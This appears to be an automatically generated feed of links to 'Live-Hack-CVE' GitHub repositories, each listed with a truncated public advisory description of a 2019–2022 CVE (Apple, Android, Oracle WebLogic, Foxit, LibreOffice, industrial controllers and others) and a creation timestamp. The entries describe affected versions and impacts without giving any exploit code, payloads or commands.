**An authentication issue was addressed with improved state management. This issue is fixed in macOS Mojave 10.14.5. A user may be unexpectedly logged in to another user’s account. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-8634](https://github.com/Live-Hack-CVE/CVE-2019-8634) create time: 2022-12-29T04:19:58Z

**A logic issue was addressed with improved state management. This issue is fixed in iOS 13.2 and iPadOS 13.2, tvOS 13.2, Safari 13.0.3, iTunes for Windows 12.10.2, iCloud for Windows 11.0. Processing maliciously crafted web content may lead to universal cross site scripting. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-8813](https://github.com/Live-Hack-CVE/CVE-2019-8813) create time: 2022-12-29T04:19:54Z

**A logic issue was addressed with improved state management. This issue is fixed in tvOS 13, iTunes for Windows 12.10.1, iCloud for Windows 10.7, iCloud for Windows 7.14. Processing maliciously crafted web content may lead to universal cross site scripting. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-8719](https://github.com/Live-Hack-CVE/CVE-2019-8719) create time: 2022-12-29T04:19:51Z

**In libvpx, there is a possible resource exhaustion due to improper input validation. This could lead to remote denial of service with no additional execution privileges needed. User interaction is needed for exploitation. Product: AndroidVersions: Android-10Android ID: A-132783254 CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-9371](https://github.com/Live-Hack-CVE/CVE-2019-9371) create time: 2022-12-29T04:19:48Z

**In libvpx, there is a possible information disclosure due to improper input validation. This could lead to remote information disclosure with no additional execution privileges needed. User interaction is needed for exploitation. Product: AndroidVersions: Android-10Android ID: A-80479354 CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-9433](https://github.com/Live-Hack-CVE/CVE-2019-9433) create time: 2022-12-29T04:19:45Z

**A logic issue was addressed with improved state management. This issue is fixed in tvOS 13, iTunes for Windows 12.10.1, iCloud for Windows 10.7, iCloud for Windows 7.14. Processing maliciously crafted web content may lead to universal cross site scripting. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-8625](https://github.com/Live-Hack-CVE/CVE-2019-8625) create time: 2022-12-29T04:19:41Z

**In opencv calls that use libpng, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with no additional execution privileges required. User interaction is not required for exploitation. Product: AndroidVersions: Android-10Android ID: A-110986616 CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-9423](https://github.com/Live-Hack-CVE/CVE-2019-9423) create time: 2022-12-29T04:19:38Z

**This vulnerability allows remote attackers to execute arbitrary code on affected installations of Foxit Reader 9.4.1.16828. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the deleteItemAt method when pro CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-6774](https://github.com/Live-Hack-CVE/CVE-2019-6774) create time: 2022-12-29T04:19:23Z

**This vulnerability allows remote attackers to execute arbitrary code on affected installations of Foxit Reader 9.5.0.20723. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the exportValues method within a CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-6775](https://github.com/Live-Hack-CVE/CVE-2019-6775) create time: 2022-12-29T04:19:16Z

**Online Store System v1.0 delete_product.php doesn't check to see if a user authtenticated or has administrative rights allowing arbitrary product deletion. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-8292](https://github.com/Live-Hack-CVE/CVE-2019-8292) create time: 2022-12-29T04:18:12Z

**Prima Systems FlexAir, Versions 2.3.38 and prior. The flash version of the web interface contains a hard-coded username and password, which may allow an authenticated attacker to escalate privileges. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-7672](https://github.com/Live-Hack-CVE/CVE-2019-7672) create time: 2022-12-29T04:18:04Z

**LibreOffice is typically bundled with LibreLogo, a programmable turtle vector graphics script, which can execute arbitrary python commands contained with the document it is launched from. LibreOffice also has a feature where documents can specify that pre-installed scripts can be executed on various document script eve CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-9855](https://github.com/Live-Hack-CVE/CVE-2019-9855) create time: 2022-12-29T04:18:00Z

**A CWE-798 use of hardcoded credentials vulnerability exists in BMX-NOR-0200H with firmware versions prior to V1.7 IR 19 which could cause a confidentiality issue when using FTP protocol. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-6812](https://github.com/Live-Hack-CVE/CVE-2019-6812) create time: 2022-12-29T04:17:57Z

**LibreOffice is typically bundled with LibreLogo, a programmable turtle vector graphics script, which can execute arbitrary python commands contained with the document it is launched from. LibreOffice also has a feature where documents can specify that pre-installed scripts can be executed on various document script eve CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-9850](https://github.com/Live-Hack-CVE/CVE-2019-9850) create time: 2022-12-29T04:17:53Z

**LibreOffice is typically bundled with LibreLogo, a programmable turtle vector graphics script, which can execute arbitrary python commands contained with the document it is launched from. Protection was added, to address CVE-2019-9848, to block calling LibreLogo from document event script handers, e.g. mouse over. Howe CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-9851](https://github.com/Live-Hack-CVE/CVE-2019-9851) create time: 2022-12-29T04:17:50Z

**A Use After Free: CWE-416 vulnerability exists in Zelio Soft 2, V5.2 and earlier, which could cause remote code execution when opening a specially crafted Zelio Soft 2 project file. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-6822](https://github.com/Live-Hack-CVE/CVE-2019-6822) create time: 2022-12-29T04:17:46Z

**A CWE-94: Code Injection vulnerability exists in ProClima (all versions prior to version 8.0.0) which could allow an unauthenticated, remote attacker to execute arbitrary code on the targeted system in all versions of ProClima prior to version 8.0.0. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-6823](https://github.com/Live-Hack-CVE/CVE-2019-6823) create time: 2022-12-29T04:17:43Z

**A CWE-119: Buffer Errors vulnerability exists in ProClima (all versions prior to version 8.0.0) which allows an unauthenticated, remote attacker to execute arbitrary code on the targeted system in all versions of ProClima prior to version 8.0.0. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-6824](https://github.com/Live-Hack-CVE/CVE-2019-6824) create time: 2022-12-29T04:17:39Z

**A CWE-787: Out-of-bounds Write vulnerability exists in Interactive Graphical SCADA System (IGSS), Version 14 and prior, which could cause a software crash when data in the mdb database is manipulated. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-6827](https://github.com/Live-Hack-CVE/CVE-2019-6827) create time: 2022-12-29T04:17:36Z

**A CWE-248: Uncaught Exception vulnerability exists IN Modicon M580 all versions prior to V2.80, which could cause a possible denial of service when sending an appropriately timed HTTP request to the controller. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-6830](https://github.com/Live-Hack-CVE/CVE-2019-6830) create time: 2022-12-29T04:17:33Z

**Wowza Streaming Engine 4.8.0 and earlier suffers from multiple CSRF vulnerabilities. For example, an administrator, by following a link, can be tricked into making unwanted changes such as adding another admin user via enginemanager/server/user/edit.htm in the Server->Users component. This issue was resolved in Wowza S CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-7654](https://github.com/Live-Hack-CVE/CVE-2019-7654) create time: 2022-12-29T04:17:29Z

**Wowza Streaming Engine 4.8.0 and earlier from multiple authenticated XSS vulnerabilities via the (1) customList%5B0%5D.value field in enginemanager/server/serversetup/edit_adv.htm of the Server Setup configuration or the (2) host field in enginemanager/j_spring_security_check of the login form. This issue was resolved CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-7655](https://github.com/Live-Hack-CVE/CVE-2019-7655) create time: 2022-12-29T04:17:26Z

**A vulnerability reported in Lenovo Service Bridge before version 4.1.0.1 could allow cross-site request forgery. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-6166](https://github.com/Live-Hack-CVE/CVE-2019-6166) create time: 2022-12-29T04:17:23Z

**An out-of-bounds read was addressed with improved bounds checking. This issue is fixed in iOS 14.2 and iPadOS 14.2, macOS Catalina 10.15.7, Security Update 2020-005 High Sierra, Security Update 2020-005 Mojave. Processing a maliciously crafted USD file may lead to unexpected application termination or arbitrary code ex CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-10011](https://github.com/Live-Hack-CVE/CVE-2020-10011) create time: 2022-12-29T04:19:31Z

**A logic issue was addressed with improved state management. This issue is fixed in macOS Big Sur 11.0.1, watchOS 7.1, iOS 14.2 and iPadOS 14.2, iCloud for Windows 11.5, tvOS 14.2, iTunes 12.11 for Windows. A local user may be able to read arbitrary files. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-10002](https://github.com/Live-Hack-CVE/CVE-2020-10002) create time: 2022-12-29T04:19:19Z

**In calc_vm_may_flags of ashmem.c, there is a possible arbitrary write to shared memory due to a permissions bypass. This could lead to local escalation of privilege by corrupting memory shared between processes, with no additional execution privileges needed. User interaction is not needed for exploitation. Product: An CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-0009](https://github.com/Live-Hack-CVE/CVE-2020-0009) create time: 2022-12-29T04:19:13Z

**In onCreate of InstallStart.java, there is a possible package validation bypass due to a time-of-check time-of-use vulnerability. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is needed for exploitation. Product: Android Versions: Android-8.0 Android I CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-0003](https://github.com/Live-Hack-CVE/CVE-2020-0003) create time: 2022-12-29T04:19:06Z

**In exif_data_save_data_entry of exif-data.c, there is a possible out of bounds read due to a missing bounds check. This could lead to local information disclosure with no additional execution privileges needed. User interaction is needed for exploitation.Product: AndroidVersions: Android-8.0 Android-8.1 Android-9 Andro CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-0093](https://github.com/Live-Hack-CVE/CVE-2020-0093) create time: 2022-12-29T04:19:02Z

**In exif_data_load_data_thumbnail of exif-data.c, there is a possible denial of service due to an integer overflow. This could lead to remote denial of service with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-10Android ID: A-145075076 CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-0181](https://github.com/Live-Hack-CVE/CVE-2020-0181) create time: 2022-12-29T04:18:59Z

**In exif_data_load_data_content of exif-data.c, there is a possible UBSAN abort due to an integer overflow. This could lead to remote denial of service with no additional execution privileges needed. User interaction is needed for exploitation.Product: AndroidVersions: Android-10Android ID: A-146428941 CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-0198](https://github.com/Live-Hack-CVE/CVE-2020-0198) create time: 2022-12-29T04:18:55Z

**A logic issue was addressed with improved state management. This issue is fixed in macOS Big Sur 11.0.1. A malicious application may be able to determine kernel memory layout. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-10007](https://github.com/Live-Hack-CVE/CVE-2020-10007) create time: 2022-12-29T04:18:25Z

**A logic issue was addressed with improved state management. This issue is fixed in macOS Big Sur 11.0.1. A sandboxed process may be able to circumvent sandbox restrictions. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-10009](https://github.com/Live-Hack-CVE/CVE-2020-10009) create time: 2022-12-29T04:18:22Z

**A path handling issue was addressed with improved validation. This issue is fixed in macOS Big Sur 11.0.1, iOS 14.2 and iPadOS 14.2, tvOS 14.2, watchOS 7.1. A local attacker may be able to elevate their privileges. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-10010](https://github.com/Live-Hack-CVE/CVE-2020-10010) create time: 2022-12-29T04:18:18Z

**An access issue was addressed with improved access restrictions. This issue is fixed in macOS Big Sur 11.0.1. Processing a maliciously crafted document may lead to a cross site scripting attack. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-10012](https://github.com/Live-Hack-CVE/CVE-2020-10012) create time: 2022-12-29T04:18:15Z

**A parsing issue in the handling of directory paths was addressed with improved path validation. This issue is fixed in macOS Big Sur 11.0.1. A malicious application may be able to break out of its sandbox. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-10014](https://github.com/Live-Hack-CVE/CVE-2020-10014) create time: 2022-12-29T04:18:07Z

**A heap-based buffer overflow was found in QEMU through 5.0.0 in the SDHCI device emulation support. It could occur while doing a multi block SDMA transfer via the sdhci_sdma_transfer_multi_blocks() routine in hw/sd/sdhci.c. A guest user or process could use this flaw to crash the QEMU process on the host, resulting in CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-17380](https://github.com/Live-Hack-CVE/CVE-2020-17380) create time: 2022-12-29T04:16:05Z

**Insufficient control flow management in subsystem for Intel(R) CSME versions before 11.8.80, 11.12.80, 11.22.80, 12.0.70, 13.0.40, 13.30.10, 14.0.45 and 14.5.25 , Intel(R) TXE versions before 3.1.80 and 4.0.30 may allow an unauthenticated user to potentially enable escalation of privilege via physical access. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-8745](https://github.com/Live-Hack-CVE/CVE-2020-8745) create time: 2022-12-29T04:14:28Z

**An out-of-bounds memory write flaw was found in how the Linux kernel’s Voice Over IP H.323 connection tracking functionality handled connections on ipv6 port 1720. This flaw allows an unauthenticated remote user to crash the system, causing a denial of service. The highest threat from this vulnerability is to confident CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-14305](https://github.com/Live-Hack-CVE/CVE-2020-14305) create time: 2022-12-29T04:13:21Z

**ncsi.c in libslirp through 4.3.1 has a buffer over-read because it tries to read a certain amount of header data even if that exceeds the total packet length. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-29129](https://github.com/Live-Hack-CVE/CVE-2020-29129) create time: 2022-12-29T04:13:09Z

**Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware (component: WLS Web Services). Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0 and 12.2.1.4.0. Easily exploitable vulnerability allows high privileged attacker with network access via IIOP, T3 to compromise Oracl CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-2798](https://github.com/Live-Hack-CVE/CVE-2020-2798) create time: 2022-12-29T03:37:40Z

**Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware (component: Core). Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0 and 12.2.1.4.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via IIOP, T3 to compromise Oracle WebLogic S CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-2884](https://github.com/Live-Hack-CVE/CVE-2020-2884) create time: 2022-12-29T03:37:37Z

**Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware (component: Web Services). Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0 and 12.2.1.4.0. Easily exploitable vulnerability allows high privileged attacker with network access via IIOP, T3 to compromise Oracle We CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-2963](https://github.com/Live-Hack-CVE/CVE-2020-2963) create time: 2022-12-29T03:37:33Z

**Vulnerability in the Oracle Coherence product of Oracle Fusion Middleware (component: Caching, CacheStore, Invocation). Supported versions that are affected are 3.7.1.0, 12.1.3.0.0, 12.2.1.3.0 and 12.2.1.4.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via IIOP, T3 to compromise CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-2915](https://github.com/Live-Hack-CVE/CVE-2020-2915) create time: 2022-12-29T03:37:29Z

**Vulnerability in the Oracle Outside In Technology product of Oracle Fusion Middleware (component: Outside In Filters). Supported versions that is affected is 8.5.4. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Outside In Technology. Successful attack CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-2787](https://github.com/Live-Hack-CVE/CVE-2020-2787) create time: 2022-12-29T03:36:45Z

**Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware (component: WLS Web Services). The supported version that is affected is 10.3.6.0.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via IIOP, T3 to compromise Oracle WebLogic Server. Successful attacks CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-2828](https://github.com/Live-Hack-CVE/CVE-2020-2828) create time: 2022-12-29T03:36:42Z

**Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware (component: Core). Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0 and 12.2.1.4.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via IIOP, T3 to compromise Oracle WebLogic S CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-2883](https://github.com/Live-Hack-CVE/CVE-2020-2883) create time: 2022-12-29T03:36:38Z

**Vulnerability in the Oracle Outside In Technology product of Oracle Fusion Middleware (component: Outside In Filters). Supported versions that is affected is 8.5.4. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Outside In Technology. Successful attack CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-2785](https://github.com/Live-Hack-CVE/CVE-2020-2785) create time: 2022-12-29T03:36:35Z

**Vulnerability in the Oracle Outside In Technology product of Oracle Fusion Middleware (component: Outside In Filters). Supported versions that is affected is 8.5.4. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Outside In Technology. Successful attack CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-2783](https://github.com/Live-Hack-CVE/CVE-2020-2783) create time: 2022-12-29T03:36:31Z

**Vulnerability in the Oracle Outside In Technology product of Oracle Fusion Middleware (component: Outside In Filters). Supported versions that is affected is 8.5.4. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Outside In Technology. Successful attack CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-2786](https://github.com/Live-Hack-CVE/CVE-2020-2786) create time: 2022-12-29T03:36:28Z

**Vulnerability in the Oracle Solaris product of Oracle Systems (component: Whodo). Supported versions that are affected are 10 and 11. Difficult to exploit vulnerability allows low privileged attacker with logon to the infrastructure where Oracle Solaris executes to compromise Oracle Solaris. Successful attacks require CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-2771](https://github.com/Live-Hack-CVE/CVE-2020-2771) create time: 2022-12-29T03:36:24Z

**Vulnerability in the Java SE product of Oracle Java SE (component: JSSE). Supported versions that are affected are Java SE: 11.0.6 and 14. Difficult to exploit vulnerability allows unauthenticated attacker with network access via HTTPS to compromise Java SE. Successful attacks of this vulnerability can result in unauth CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-2778](https://github.com/Live-Hack-CVE/CVE-2020-2778) create time: 2022-12-29T03:36:21Z

**Insufficient policy enforcement in developer tools in Google Chrome prior to 83.0.4103.97 allowed an attacker who convinced a user to install a malicious extension to potentially perform a sandbox escape via a crafted Chrome Extension. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-6495](https://github.com/Live-Hack-CVE/CVE-2020-6495) create time: 2022-12-29T03:34:02Z

**options.c in atftp before 0.7.5 reads past the end of an array, and consequently discloses server-side /etc/group data to a remote client. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-46671](https://github.com/Live-Hack-CVE/CVE-2021-46671) create time: 2022-12-29T04:15:51Z

**A vulnerability has been identified in JT Utilities (All versions < V13.1.1.0), JTTK (All versions < V11.1.1.0). JTTK library in affected products is vulnerable to an out of bounds read past the end of an allocated buffer when parsing specially crafted JT files. An attacker could leverage this vulnerability to leak inf CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-44444](https://github.com/Live-Hack-CVE/CVE-2021-44444) create time: 2022-12-29T04:14:15Z

**Improper Input Validation vulnerability in request line parsing of Apache Traffic Server allows an attacker to send invalid requests. This issue affects Apache Traffic Server 8.0.0 to 8.1.3 and 9.0.0 to 9.1.1. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-44040](https://github.com/Live-Hack-CVE/CVE-2021-44040) create time: 2022-12-29T04:14:11Z

**Improper Authentication vulnerability in TLS origin validation of Apache Traffic Server allows an attacker to create a man in the middle attack. This issue affects Apache Traffic Server 8.0.0 to 8.1.0. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-44759](https://github.com/Live-Hack-CVE/CVE-2021-44759) create time: 2022-12-29T04:14:07Z

**All versions of Samba prior to 4.13.16 are vulnerable to a malicious client using an SMB1 or NFS race to allow a directory to be created in an area of the server file system not exported under the share definition. Note that SMB1 has to be enabled, or the share also available via NFS in order for this attack to succeed CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-43566](https://github.com/Live-Hack-CVE/CVE-2021-43566) create time: 2022-12-29T04:14:04Z

**Inkscape version 0.91 is vulnerable to an out-of-bounds write, which may allow an attacker to arbitrary execute code. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-42704](https://github.com/Live-Hack-CVE/CVE-2021-42704) create time: 2022-12-29T04:14:00Z

**Microsoft MSHTML Remote Code Execution Vulnerability CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-40444](https://github.com/Live-Hack-CVE/CVE-2021-40444) create time: 2022-12-29T04:13:52Z

**Improper Input Validation vulnerability in header parsing of Apache Traffic Server allows an attacker to smuggle requests. This issue affects Apache Traffic Server 8.0.0 to 8.1.2 and 9.0.0 to 9.1.0. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-37149](https://github.com/Live-Hack-CVE/CVE-2021-37149) create time: 2022-12-29T04:13:48Z

**Improper input validation vulnerability in header parsing of Apache Traffic Server allows an attacker to smuggle requests. This issue affects Apache Traffic Server 8.0.0 to 8.1.2 and 9.0.0 to 9.0.1. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-37148](https://github.com/Live-Hack-CVE/CVE-2021-37148) create time: 2022-12-29T04:13:45Z

**Improper input validation vulnerability in header parsing of Apache Traffic Server allows an attacker to smuggle requests. This issue affects Apache Traffic Server 8.0.0 to 8.1.2 and 9.0.0 to 9.1.0. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-37147](https://github.com/Live-Hack-CVE/CVE-2021-37147) create time: 2022-12-29T04:13:41Z

**Smarty before 3.1.39 allows code injection via an unexpected function name after a {function name= substring. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-26120](https://github.com/Live-Hack-CVE/CVE-2021-26120) create time: 2022-12-29T04:13:16Z

**Smarty before 3.1.39 allows a Sandbox Escape because $smarty.template_object can be accessed in sandbox mode. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-26119](https://github.com/Live-Hack-CVE/CVE-2021-26119) create time: 2022-12-29T04:13:13Z

**GLPI is an open-source asset and IT management software package that provides ITIL Service Desk features, licenses tracking and software auditing. In GLPI version 9.5.3, it was possible to switch entities with IDOR from a logged in user. This is fixed in version 9.5.4. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-21255](https://github.com/Live-Hack-CVE/CVE-2021-21255) create time: 2022-12-29T04:12:44Z

**SonicWall GMS is vulnerable to file path manipulation resulting that an unauthenticated attacker can gain access to web directory containing application's binaries and configuration files. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-20030](https://github.com/Live-Hack-CVE/CVE-2021-20030) create time: 2022-12-29T04:09:33Z

**** DISPUTED ** The Telegram app 7.6.2 for iOS allows remote authenticated users to cause a denial of service (application crash) if the victim pastes an attacker-supplied message (e.g., in the Persian language) into a channel or group. The crash occurs in MtProtoKitFramework. NOTE: the vendor's perspective is that "thi CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-30496](https://github.com/Live-Hack-CVE/CVE-2021-30496) create time: 2022-12-29T03:38:18Z

**Cleartext transmission of sensitive information vulnerability in MELSEC iQ-R series Safety CPU R08/16/32/120SFCPU firmware versions "26" and prior and MELSEC iQ-R series SIL2 Process CPU R08/16/32/120PSFCPU all versions allows a remote unauthenticated attacker to login to a target CPU module by obtaining credentials ot CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-20599](https://github.com/Live-Hack-CVE/CVE-2021-20599) create time: 2022-12-29T03:38:14Z

**Insufficiently Protected Credentials vulnerability in Mitsubishi Electric MELSEC iQ-R series Safety CPU modules R08/16/32/120SFCPU firmware versions "26" and prior and Mitsubishi Electric MELSEC iQ-R series SIL2 Process CPU modules R08/16/32/120PSFCPU all versions allows a remote unauthenticated attacker to login to th CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-20597](https://github.com/Live-Hack-CVE/CVE-2021-20597) create time: 2022-12-29T03:37:26Z

**Exposure of Sensitive Information to an Unauthorized Actor vulnerability in Mitsubishi Electric MELSEC iQ-R series Safety CPU modules R08/16/32/120SFCPU firmware versions "26" and prior and Mitsubishi Electric MELSEC iQ-R series SIL2 Process CPU modules R08/16/32/120PSFCPU all versions allows a remote unauthenticated a CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-20594](https://github.com/Live-Hack-CVE/CVE-2021-20594) create time: 2022-12-29T03:37:23Z

**Odyssey passes to server unencrypted bytes from man-in-the-middle When Odyssey is configured to use certificate Common Name for client authentication, a man-in-the-middle attacker can inject arbitrary SQL queries when a connection is first established, despite the use of SSL certificate verification and encryption. Thi CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-43766](https://github.com/Live-Hack-CVE/CVE-2021-43766) create time: 2022-12-29T03:36:17Z

**An issue was discovered in the FUSE filesystem implementation in the Linux kernel before 5.10.6, aka CID-5d069dbe8aaf. fuse_do_getattr() calls make_bad_inode() in inappropriate situations, causing a system crash. NOTE: the original fix for this vulnerability was incomplete, and its incompleteness is tracked as CVE-2021 CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-36322](https://github.com/Live-Hack-CVE/CVE-2020-36322) create time: 2022-12-29T03:35:39Z

**A UNIX Symbolic Link (Symlink) Following vulnerability in python-postorius of openSUSE Leap 15.2, Factory allows local attackers to escalate from users postorius or postorius-admin to root. This issue affects: openSUSE Leap 15.2 python-postorius version 1.3.2-lp152.1.2 and prior versions. openSUSE Factory python-postor CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-31997](https://github.com/Live-Hack-CVE/CVE-2021-31997) create time: 2022-12-29T03:35:29Z

**An attacker may be able to use minify route with a relative path to view any file on the Cassia Networks Access Controller prior to 2.0.1. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-22685](https://github.com/Live-Hack-CVE/CVE-2021-22685) create time: 2022-12-29T03:30:59Z

**In HTBLogKM of TBD, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege in the kernel with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android SoCAndroid ID: A-242345178 CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-0699](https://github.com/Live-Hack-CVE/CVE-2021-0699) create time: 2022-12-29T03:29:52Z

**The affected product is vulnerable to a network-based attack by threat actors supplying a crafted, malicious XML payload designed to trigger an external entity reference call. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-43990](https://github.com/Live-Hack-CVE/CVE-2021-43990) create time: 2022-12-29T03:27:53Z

**The affected product is vulnerable to a network-based attack by threat actors utilizing crafted naming conventions of files to gain unauthorized access rights. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-43988](https://github.com/Live-Hack-CVE/CVE-2021-43988) create time: 2022-12-29T03:27:49Z

**The setup program for the affected product configures its files and folders with full access, which may allow unauthorized users permission to replace original binaries and achieve privilege escalation. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-43986](https://github.com/Live-Hack-CVE/CVE-2021-43986) create time: 2022-12-29T03:27:46Z

**NVIDIA Jetson Linux Driver Package contains a vulnerability in the Cboot ext4_mount function, where Insufficient validation of untrusted data may allow a highly privileged local attacker to cause an integer overflow. This difficult-to-exploit vulnerability may lead to code execution, escalation of privileges, limited d CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-28197](https://github.com/Live-Hack-CVE/CVE-2022-28197) create time: 2022-12-29T04:19:35Z

**The Amministrazione Aperta WordPress plugin before 3.8 does not validate the open parameter before using it in an include statement, leading to a Local File Inclusion issue. The original advisory mentions that unauthenticated users can exploit this, however the affected file generates a fatal error when accessed direct CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-1560](https://github.com/Live-Hack-CVE/CVE-2022-1560) create time: 2022-12-29T04:19:28Z

**NVIDIA Jetson Linux Driver Package contains a vulnerability in the Cboot module tegrabl_cbo.c, where insufficient validation of untrusted data may allow a local attacker with elevated privileges to cause a memory buffer overflow, which may lead to code execution, loss of integrity, limited denial of service, and some i CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-28193](https://github.com/Live-Hack-CVE/CVE-2022-28193) create time: 2022-12-29T04:19:09Z

**Dell BIOS contains an improper input validation vulnerability. A local authenticated malicious user may potentially exploit this vulnerability by using an SMI to gain arbitrary code execution in SMRAM. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-32492](https://github.com/Live-Hack-CVE/CVE-2022-32492) create time: 2022-12-29T04:17:02Z

**Dell BIOS contains an improper input validation vulnerability. A local authenticated malicious user may potentially exploit this vulnerability by using an SMI to gain arbitrary code execution in SMRAM. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-32486](https://github.com/Live-Hack-CVE/CVE-2022-32486) create time: 2022-12-29T04:16:40Z

